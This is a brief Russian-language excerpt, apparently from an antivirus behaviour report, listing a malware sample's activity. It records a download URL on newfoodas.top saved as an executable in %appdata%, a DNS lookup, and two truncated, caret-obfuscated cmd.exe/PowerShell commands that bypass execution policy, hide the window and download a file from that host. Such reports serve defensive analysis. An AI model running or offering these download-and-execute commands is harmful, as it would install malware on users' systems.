Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^W^Er^S^HelL.E^x^E -E^xEcUtI^onpolIcy^ ^B^Y^pA^S^s ^-nO^P^Rof^Ile -W^i^N^DOwS^tY^l^E H^id^DEn (n^EW-ObJec^T ^s^ySTEm^.^NeT^.W^E^Bc^lIE^N^t).DO^W^Nl^oaDFi^L^e^('http://newfoodas....
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /C "Po^W^Er^S^HelL.E^x^E -E^xEcUtI^onpolIcy^ ^B^Y^pA^S^s ^-nO^P^Rof^Ile -W^i^N^DOwS^tY^l^E H^id^DEn (n^EW-ObJec^T ^s^ySTEm^.^NeT^.W^E^Bc^lIE^N^t).DO^W^Nl^oaDFi^L^e^('http://newfoodas....' (со скрытым окном)